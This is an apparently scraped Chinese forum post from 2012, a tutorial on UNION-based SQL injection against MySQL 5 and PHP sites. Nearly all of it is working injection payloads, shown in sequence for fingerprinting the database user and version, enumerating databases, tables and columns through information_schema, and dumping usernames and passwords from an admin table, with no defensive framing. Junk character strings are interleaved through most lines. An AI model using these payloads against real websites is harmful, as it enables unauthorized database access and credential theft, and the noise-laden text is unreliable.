; @0 m$ O) s) i8 k P* W; J
教程内容:Mysql 5+php 注入# a" f% \' `$ {( M+ G n/ J9 N
6 Q; e, G) q, |0 [% A, w" k
1 a) j3 L6 S% r/ }- _) ]5 ~1 l& b4 K) i" i
一.查看MYSQL基本信息(库名,版本,用户)
) s, x* i: Q u/ p: o* F8 y, F0 s- b( V% T9 N5 E5 w
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
6 e$ b/ u* D/ S% o0 i. s* c0 L7 H$ i: b6 @" X3 w B* r# D
二.查数据库' C4 g& G/ S0 m
/ b" k/ C$ X5 y( j" ?6 Z( ?and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
& V4 K) W- s' I6 @8 c6 Zlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
6 b+ p1 k* P7 C% v7 ~/ C3 U
" N9 A1 j5 i9 V- u/ X* ] D) c三.暴表
) ^+ W9 M5 b8 f: `; ]8 c) ]
' w8 g9 _9 f" ~& band 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*. @$ p+ j* b# i( v7 n4 {. q
6 t( @. i" S( d6 _ Q7 `
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。) h$ o7 o* a' k* F9 k9 x. Y6 `
" p9 l$ @$ W8 ]/ B, A+ R
四.暴字段6 s5 b! T. E3 a* ~
+ Q* C4 n# e$ _) ~4 c7 Q$ M
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*6 Q7 U# o8 D( H" P: w
. H1 f5 e4 y7 W0 p9 r# Glimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
& g* h: Q1 b$ o* Q' A6 \0 n" [- X* x
五.暴数据
! e, g0 ?/ R; c# d" ~$ B; Q4 ?% F
7 h4 M/ u) q, ^% B6 Kand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
7 i7 N- E* `4 i& I& x' }
2 ]- M1 }" R4 b
% T6 x; D& m' M这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
! o* e% o6 G% j- [: v( s9 u. [ |
发表于 2012-9-13 16:27:53
收藏
支持
反对